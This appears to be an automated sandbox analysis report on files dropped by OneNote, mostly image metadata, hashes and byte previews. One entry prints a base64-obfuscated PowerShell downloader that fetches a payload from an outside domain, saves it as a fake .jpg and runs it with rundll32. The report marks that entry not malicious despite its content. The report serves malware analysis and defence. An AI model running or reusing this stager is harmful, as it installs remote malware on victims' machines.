                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):14177
                                                                                                                                                                                                              Entropy (8bit):5.705782002886174
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
                                                                                                                                                                                                              MD5:7CDCE7EEBF795998DA6CAC11D363291C
                                                                                                                                                                                                              SHA1:183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
                                                                                                                                                                                                              SHA-256:DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
                                                                                                                                                                                                              SHA-512:560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E|....,iOyD|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):55804
                                                                                                                                                                                                              Entropy (8bit):7.433623355028275
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
                                                                                                                                                                                                              MD5:4126992F65FE53D3E3E78F6B27FD49DC
                                                                                                                                                                                                              SHA1:BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
                                                                                                                                                                                                              SHA-256:3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
                                                                                                                                                                                                              SHA-512:624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.*a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[...*..t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 600, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4410
                                                                                                                                                                                                              Entropy (8bit):7.857636973514526
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:E/pQuIhKZ7u06dICH3AroiTe8DGTl55poBUmLNjpH7MvDHjfm:MpdZtPbknnRPpkLNVMvu
                                                                                                                                                                                                              MD5:2494381A1ACDC83843B912CFCDE5643B
                                                                                                                                                                                                              SHA1:98F9D1CC140076D1AE5A9EA19F47658FD5DF0D66
                                                                                                                                                                                                              SHA-256:5EEBE803E434A845D19BC600DF3C75E98BB69BD0DE473CEEC410D1B3A9154E28
                                                                                                                                                                                                              SHA-512:0E64CC3723DC41D94910F7ADFB6A0DFB5049350FD15A873695614E4A89ABD78B166BA4E9C8CB95E275FB56981539DECD2A7F28FBC25E80DD5E2DEA8077CC9489
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2...X.......E.....PLTE...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................B..(....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.].\TU.?3"...(..L........q.Q...H.*j......W..Xd.ie.f..%.XT...em..m.m.vkik...>.}..}|..{'.U..~......}....s.............,CVu.x.:C..5...;.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):40035
                                                                                                                                                                                                              Entropy (8bit):7.360144465307449
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:MQhziQo1RKGlyyzYjlxuxwRUj/BN837xRmwH2uDTCn8qXFQziN:ThzrSzalg6O563l4uTC8q1Ig
                                                                                                                                                                                                              MD5:B1DDD365D87605F96D72042CB56572F6
                                                                                                                                                                                                              SHA1:ADF71DAD1A62B8A58A657C2EDBDD665A19EB846B
                                                                                                                                                                                                              SHA-256:06E09DE80C3F32254DA4FE6B2CBAD7C05EF144DD54B8C65745E195BBF7317A2E
                                                                                                                                                                                                              SHA-512:9C686092CC9524F34EA6CEC9AAE936A6225BCC54DE38DE1786EBA8F532959A80FF885E8664A09E4C318D7CA4B278E807D3D1F135BE55F30979B844FF5EC9699A
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!1....AQ.aq.....".3.5...2B#s.$%..Rr.CS4&6...bE'7.c.DTtU...d.eu...VFfv.Gw.....Wg......................!...1AQaq........"2..4..Rbr#3$...B.s5Cc.S%.D............?..^.f....R*.N{.{f.....O.r.V.;U..~...U.(..>M._.yI.{8,..^.t...s`...j.O..U5t.&&..h.G.6Da.;.....J.......E..QD...C...}..N...tR.....~..].J:.V$.*.r......]...W......4.[.)6..Y_.....4...........m._'HR.a......]U=.....n...0.W..]..K..){.+...w...f...<|..1/.|.....b..-..y....]U#Ctn.7m.._.|..2I;|....tM....q.q.}.N)....'...9&...nR...R..}.........m._.LZ}u.../K....9.~..?.{....V.#..dx.Zk.:=..:.j].....E#....E~w%....J..[S..[......gr...vb.r]..<..ut..i...[P.w....:..Gkn>......#..m...9km`......t).up.....w....VOR.{&.nQI..}...wD.7Ey#n....MO.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 613x144, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):29187
                                                                                                                                                                                                              Entropy (8bit):7.971308326749753
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:RwjBOlCk+nYnGagKJWJhwMJiRO22ZIm4VXvXx1tA6BQs:i8snY3JW7uROlEfbtVL
                                                                                                                                                                                                              MD5:DF99CAAAB9A7DE97B63343E60A699AB6
                                                                                                                                                                                                              SHA1:B84334135CFB73BC6EF55F85926770D5AC6DFEA8
                                                                                                                                                                                                              SHA-256:74C131777E7C437FD654427417097BC01B0813BA8E1E50E4B937BD50A1BEBCDB
                                                                                                                                                                                                              SHA-512:5D15AAAA8B71DDFE01A7C0ADE16D9E1F5E9AAE484BCD711B38CCB103ED9564CAAC23A0031471167B660E15972D70179C2A387509B213C05D60261042A0456025
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H.....C....................................................................C.........................................................................e..............................................`.............................!1Qq...2ARa..."#.....3BSbr...$4C...Tcs......%&DUd...E....56Fe....................................H........................!1Qa..Aq..."b....2R...BSr..#...3..Cc....$%4...............?...b.d.8T1.;#.S.DO...~.R.......3.xe...z.6..."m..k...;*.'.f.5^.....m..<$....8.R.j.D.v..>...*dT..vGbt...I......sEWp.r3.. ..G...6.....w...l.S..q...b.....-R....^Zu5+u6...A..Z].:...5..Uzn.,l.L.....?%.*.S.+zVg7.=.s.Q.....8..:,c.......ZE...>'IF..W.0.d.......c.e.d.V.t..S$.DNR.[....g..#i.$. .U.SK2.....k...J5u u\R.....T.[4..A.O..,.T..................] .i...B.m.^f....._...{S.....<......:..|D...+...NA....Y.^f.1|..%K~1..B..^...S..v=.c..g.tX[..kTJ..t.gr....R..@.F....5j..2.K.9..g.1N.....*.U...^w......>+.l.v...@N....%Qd...t.Ni.....0;lggm...K".+!.,.....[J...>..?f.]._;
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:05:55], progressive, precision 8, 612x618, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):68633
                                                                                                                                                                                                              Entropy (8bit):7.709776384921022
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:tapXpSTJDOkFGdJdBk/slsbfsw1imaapnbvD8:U2OjJr6b07m1bvD8
                                                                                                                                                                                                              MD5:41241EE59AB7BC9EB34784E3BCE31CB4
                                                                                                                                                                                                              SHA1:98680761A51E9199CF3C89F68B5309FBEC7EE3CB
                                                                                                                                                                                                              SHA-256:035B26DF61855A3F36DBD30FDAB0C157C04C9E8AE2197EA4D4AEB3E82E6A4C2B
                                                                                                                                                                                                              SHA-512:3EE331D5BCEE4AD5D3FC9661D4AB4053F7D351591A094334F963C33C9D0E32CCCABE9334AD7C308108CE99617E064FE848DCD469ACD8D83FBE5C4452DE523D8F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:05:55.............................d...........j...........................................&.(.........................................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?../$.W:SZ./...9.....-...u......r.....].c...@W_.7...+......v.+PD.I..-<1.pDn-\.....p.$....0.}V....\..>.~..XN.o..l(E....ik..o.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):86187
                                                                                                                                                                                                              Entropy (8bit):7.951356272886186
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:AbmHwD7za0syWMetp3TdPFzoJamVdAQZCiUit9qbYN6LerhWMzIWgN1EeaYhJM:1QnzsyTeP3TPAdAQZCi5qbYEKrhWWMNO
                                                                                                                                                                                                              MD5:FEE4785DF76E93A9DC2F4501CBAEAE12
                                                                                                                                                                                                              SHA1:8FB4527BDE05EF208FCDB168098A07707C27501F
                                                                                                                                                                                                              SHA-256:F091DED5E283AF6848670A3172E7C43C6099875D39B3FC69C2BDBA914F609602
                                                                                                                                                                                                              SHA-512:7E99D33151A0D3873D6A819C98EA8E62D928C087B7BA2080F11C7BCF746AD60A44D4FF6EE3D2D2E8DFA4BF1FC6285ED56BB83F91C2FC6FC4FDFF2000105F10B1
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d...........................................................................................1.!Aq...Qa."...2..BR#...br......6v.7..3.CSc...$4.s..&dt%u.f.......................!1.AQ..aq........"2.B#....Rb3..t.5u.67.8.r..$....C4.cs.Sd%.DEUe&.............?............w.....c.....i.A.....3...7.......7..P......%.........?Th..l./?.;.....$}..=5Oa...F.c.A/...D.D..]..y..3e.5\%.fo2.X.*]q.5Ee.}..i..md.T....#...-...Mu...9...-+..~w5O.);..G..'.;..).....A_...M.vV..y.q......,<.3.(...._K:..XM.......w.......9..T.......?b..a-%.c;.}..>....|.,lZKCEB.t...fw|.Sw^..Y..:.J.................t._P..v..j.1.R8.R....G..W*H<(Xi........i..xcu...WM.dqM>'W..g....M.q.....+.....b'..~....>..T.~Jc....fj.X.x..9...N.w.6:..>.......&.(h..u...t._...)_k#7Za...cZ....P...Y..;.V.,..xo.....f........Y...\6...M'L._
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 276x139, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4819
                                                                                                                                                                                                              Entropy (8bit):7.874649683222419
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:/hnQiz+ET2/hDi+tv34VtpWfowTHgegb6hhLT1NTS:5nQ6TAhLtvIzMvbi6hhF0
                                                                                                                                                                                                              MD5:5D6C1F361BC04403555BE945E28E53FC
                                                                                                                                                                                                              SHA1:00C254F7B3BC0289590C2BBDBB39C8EC2E2B2821
                                                                                                                                                                                                              SHA-256:131D637CDC5D0B094FB9FAD17F4D2A1ACE0D03613588155AACAA2D1CB4E16DA9
                                                                                                                                                                                                              SHA-512:34D2C0929FCC3CC10D0A2121BD55BFA9A07062C2A7B8F101071164C946895DBCB2777641E79DE4193D57A3F0778DD4F1351FAF333B7E4B4DBE31A32DD69C51F9
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222...........".......................................<........................!1..AQaq"...2B...#Rb..r..$3CS.cs..................................................!1A............?.............u....p.p($.Y...9,j...V.*..S86yh.G.#m.5..9...6Y.."C.R:.[..-.7U3c:..].;.....f.?%..<T...&F.Lh.N...m]..x.D.g<B.....k..S........>j.K....#U..Z....<e.:..8....o..xq.[..4v..U..y...k... k....A#..A...pn.jJ.I.7:..{.b..ns.t,...8.Td.I....m.I.5Z.).-.. ]..X.Do%.....?..4jV.`llt.E...5...u.|..\F.=.F.r<...5dV....xc.%..&...4,...f...3..H.<......eQ...P.J....7...lLc..?..-.fR..7.#.6.......}:.]'.ny..........e;u.Y..$0...i..-....f..9(....}..T,.Inb...+=Cca7....WULA1@.s...4uY5.N.f.c..].ks.....3v..~..k..m)...f gNE`S......#.....Z..6.uc.m...#k.s.f*.l.$6..?..xC.Cm.`...N2..&H...._.&.E...[....f.Z./...!.a{K..#.V.5..v.B....1...9..B.&....%s.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:ASCII text, with very long lines (376), with no line terminators
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):376
                                                                                                                                                                                                              Entropy (8bit):5.791466963001911
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSuaNaTxEkRcdCe/ydGx8vWHWm+CxhIEXr2:ssLgyaI4HPKC2EwgvBSrkmdhKEAWHB+D
                                                                                                                                                                                                              MD5:DE85AF8741A255BEE889294D26CB536A
                                                                                                                                                                                                              SHA1:DC1964B10E6D1513A5F414608DB4CD3F19B865E5
                                                                                                                                                                                                              SHA-256:A7785E460E6CF4B147A981BB91F62842D2386A23F00EAEEEFFF13E6C4DFE2F7D
                                                                                                                                                                                                              SHA-512:9D90493F9B366D5A238BA7BF398F3CB24A8DDD27817FF10A24B180A9CA62087C3A6B0D575CC7B36E6AC832EF0E476B3D8350F91333C5F13731E3AD421814115C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3Rhc3NvaW5tb2JpbGlhcmlhLmNvbS81NkcwLzAxLmdpZiAtT3V0RmlsZSBDOlxwcm9ncmFtZGF0YVxwdXR0eS5qcGcNCnJ1bmRsbDMyIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZyxXaW5kDQpleGl0DQo=')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):95763
                                                                                                                                                                                                              Entropy (8bit):7.931689087616878
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:1536:EoES7mhTyzabUaE77xAOmq0zVruQlttNxlipxVWssMU2YhRy2v6pKKYhQzwMc2:zz7mhTyzabUa4b4xuQlttnlGx8x9h02M
                                                                                                                                                                                                              MD5:177DD42CA99CAA2CCBF2974221680334
                                                                                                                                                                                                              SHA1:35FD86B3DD082A6D4930C67BC0E05D3B5817465A
                                                                                                                                                                                                              SHA-256:525A857D0EDA855A64D3619DF58B1C2D013A73E60FA0D49B155ECFCB2C134C7C
                                                                                                                                                                                                              SHA-512:6FB6D9A6C97B1115C3246690A2F339CD612899AC25ACBA00296EAEAA0A1D094E7339D670969764FE23EB7C08FCDD01C6F78FBC0735D504D5E02AD342901719B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!..1AQa...q......."...2..B#Rb3..r$...6..C4....Ss%5...tu.c..Dd.EU7....................!.1.AQ..aq......"r..2...4Rb#3$B.Ss............?..H..dV....U..-..0]Cp.%O.Z.Y.e.=/.q.....j76.w@s...5.&&&5...n..w..>.1....;.vR..[.......=.......KtY]u3.g18...).r....&.IZ'.....g..4kY..X..b.......y<...r1........e.._...X...w....op.m%Jr31...S.Vo.._....OI\]....F..V-....\...2j..X.....y.p.$4.....&#..]..n.V..x..P...F..C.f....])..~..Z\.....,..#..v..v...2V.k.SuaydO../[.*c._..oTV<Z.s.[...o.x..>....-....v...#....-.X..L.Z./#.XG.-.0......%w..H.@aZ....C.}...N~.;..R......5.D......I.... .R........s.>..ks....(...S...9....2=. :^.. p.+?(....$..Q..I.........=|..`2. v..t......U*.8.u.. ...'...*...2;u....& 3..$.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 728x77, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2695
                                                                                                                                                                                                              Entropy (8bit):7.434963358385164
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:N9YMsguOZgKAz2vcaQU4R8r4BU0/Rc4nbIQdsohw13ZmFLY6KsVvMdBL2mr:/hsEgNz2v5T/rQC67SoWniHK4EdBH
                                                                                                                                                                                                              MD5:B23DE98D5B4AFC269ED7EBFDDECE9716
                                                                                                                                                                                                              SHA1:10AF507A8079293A9AE0E3B96CF63A949B4588AA
                                                                                                                                                                                                              SHA-256:646586CB71742A2369A529876B41AF6A472C35CC508D1AE5D8395D55784814F2
                                                                                                                                                                                                              SHA-512:BBACBE205EC0A4F4E3AB7E2B1DEE36FCF087DDF77C7D18B53AEA4B15984A47C64E19F9B8D8FA568620619CEA0361D94FE7ABEA6E502EC6ECAEFE957F42ED7EE8
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.............C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222......M....".......................................,.......................1....!ABQRq.2a."CbS.......................................................Qa1A............?....{............i........l..-D.q.~..|cS.S...R\..d.8,!.....]f$....Q..di.;~5......vj......MqCe..=.*.f^..=.}.Cm]qCd..s=..u.e..v..t'.,.....S.s..N...>.d4'.,..k...N...d..9....G...y....6J.Y.l.{Vf...^B..i.3.z....:5W#4@.S\fj.%..Mb.5.v.5......S.E..#.v.I.....I......m..H....D..|.Y|...W.Wf..o..U.0.E..@.T.....................................'.S../...Z......!J..1K..rI...T.f.>.+.N..o.....\..^u........e..q.qK.GXP..-...F8".;5J...]Y......j.a.,R.......J.N........z}<qu..J.)`.}X:..}.............B...[. ......,B.).b.......(Y.O....c\.o.e&.W.#Bo..N|..N8.#J.>1D.1..b.&....q.#..UT%,.d.....m&..^...VXA..b.nbTV~.....^........q..#./.I..=Q..=..Y.*.Ib...VZ+......Y.........'.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:PNG image data, 50 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):2033
                                                                                                                                                                                                              Entropy (8bit):6.8741208714657
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
                                                                                                                                                                                                              MD5:CA7D2BECCBC3741D73453DCF21D846E0
                                                                                                                                                                                                              SHA1:E34B7788498E33FFF0CFB00125E6BA9E090F6CED
                                                                                                                                                                                                              SHA-256:E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
                                                                                                                                                                                                              SHA-512:7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):36740
                                                                                                                                                                                                              Entropy (8bit):7.48266872907324
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
                                                                                                                                                                                                              MD5:9C205C8D770516C5AA70D31B2CA00AF3
                                                                                                                                                                                                              SHA1:9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
                                                                                                                                                                                                              SHA-256:E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
                                                                                                                                                                                                              SHA-512:A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6514042201159704
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RacqGtYyf9/UfjxaXFFBtwnqHi2Wf/+9q:YcqGtYyfSItw4i2H9q
                                                                                                                                                                                                              MD5:555896CBB903CDB782BBD8943D1AC214
                                                                                                                                                                                                              SHA1:40F6837C54F2B14A0204DC4B3C6C4681C3F5BCBC
                                                                                                                                                                                                              SHA-256:9DDDE1000DD8CC7FA2F946CBFAD5C5EA21449584DD4D9DAA29076AA7D27831FF
                                                                                                                                                                                                              SHA-512:77F4412FF2A0CABFE3CC7DB941C5F32153A658D3AE79CC388BDEF57290E15EB070295BC2F668F4BCD88431271BE53D2A9C8D3CBF31E947525C131A2AE67AB463
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:./.C..vL....W"v_~.d...L.}.T..G................?.....I...............................................................................................................h...........................................}i!.C.UG.................p`P.nJ.1..H..............................f..>f..>f..>f..>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4744
                                                                                                                                                                                                              Entropy (8bit):0.6472105059640592
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:RaBtljYyf9/Uf/rw/NFFBtNs7ZGWf/dCZ6:YBTYyfSHctS7QMCI
                                                                                                                                                                                                              MD5:7251D51375CB5799DF79920C88D8F786
                                                                                                                                                                                                              SHA1:176AA59F6B5FE539677A4762E9267FDAC246DAC3
                                                                                                                                                                                                              SHA-256:1CF529C95E10F0B8083E796C57B93C6A53EE716C3A5FBE3F29E564F1B86DE4EB
                                                                                                                                                                                                              SHA-512:EFEF622E51C522104A6DDDFB88095BE8387F07A7CE93734676A917E3093ACBC6A316F373ADE67E4ADAE55054B6C8BA83EB341A1A19B077AA2DD0EB63480C5FEB
                                                                                                                                                                                                              Malicious:false
